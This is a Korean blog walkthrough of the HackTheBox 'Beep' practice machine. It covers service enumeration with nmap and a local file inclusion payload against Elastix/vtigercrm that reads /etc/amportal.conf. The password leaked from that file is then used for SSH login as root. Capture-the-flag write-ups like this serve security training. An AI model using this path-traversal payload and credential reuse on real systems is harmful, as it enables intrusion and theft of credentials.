HackTheBox - Beep환경 실습
진행 절차
Step 1. HackTheBox 사용을 위해 Kali Linux에서 VPN 맺은 후, 정보 수집을 위해 mnap을 통해 확인해본 결과, 다수의 포트가 Open되어 있음을 확인
| 명령어 |
| root@kali#nmap –sV –sC 10.10.10.7 |
| NMAP을 통해 수집한 정보 | |
| SSH(22/TCP) | - OpenSSH 4.3 |
| SMTP(25/TCP) | - Postfix smtpd |
| HTTP(80/TCP) | - Apache httpd 2.2.3 |
| POP3(110/TCP) | - Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7.7.el5_6.4 |
| RPCBIND(111/TCP) | - rpcbind |
| IMAP(143/TCP) | - Cyrus imapd 2.3.7-Invoca-RPM-2.3.7.7.el5_6.4 |
| HTTPS(443/TCP) | - Apache httpd 2.3.3 |
| IMAP(993/TCP) | - Cyrus imapd |
| POP3(995/TCP) | - Cyrus pop3d |
| MYSQL(3306/TCP) | - MySQL |
| HTTP(10000/TCP) | - MiniServ 1.570(Webmin httpd) |
Step 2. 일단 HTTP로 접근 시, HTTPS로 리다이렉트 되며 Elastix 페이지가 뜨는 것을 확인. 해당 환경에 공격할 수 있는 공격 코드에 있는지 조회 했을 때 XSS, SQL Injection, LFI 등이 있는 것으로 확인. XSS, SQL Injection의 경우 직접적인 리버스 쉘 획득이 어려울 것으로 판단하여 LFI(Local File Include)를 통해 점검할 예정. 해당 Exploit 코드 파일을 조회했을 때 하기에 기재된 경로에서 로컬 파일을 조회할 수 있는 것으로 확인. 해당 경로로 접근 시 Elastix의 환경구성 파일이 조회 가능 확인.
| 명령어 |
| root@kali#searchsploit elastix |
| root@kali#searchsploit –m 37637 |
| root@kali#mousepad 37637.pl |
| 경로 |
| https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action |
Step 3. 접근한 'amportal.conf' 파일에서 패스워드로 추측되는 정보 획득. 해당 시스템에 존재하는 계정 정보를 확인하기 위해 '/etc/passwd'를 조회 시, root를 포함해 다수 계정 존재 여부 확인. ssh로 root 계정으로 접근 시 루트 계정으로 접근 가능 확인
- 위 글에 제시한 방법 이외에 다른 방법으로 침투 가능(추후에 업데이트 할 예정)
| 명령어 |
| root@kali#ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1 root@10.10.10.7 |
'hackthebox' 카테고리의 다른 글
| HackTheBox - Nineveh (0) | 2023.11.22 |
|---|---|
| HackTheBox - Cronos (2) | 2023.11.17 |
| HackTheBox - Nibbles (0) | 2023.11.14 |
| HackTheBox - Bashed (2) | 2023.11.13 |
| HackTheBox - Shocker (0) | 2023.11.10 |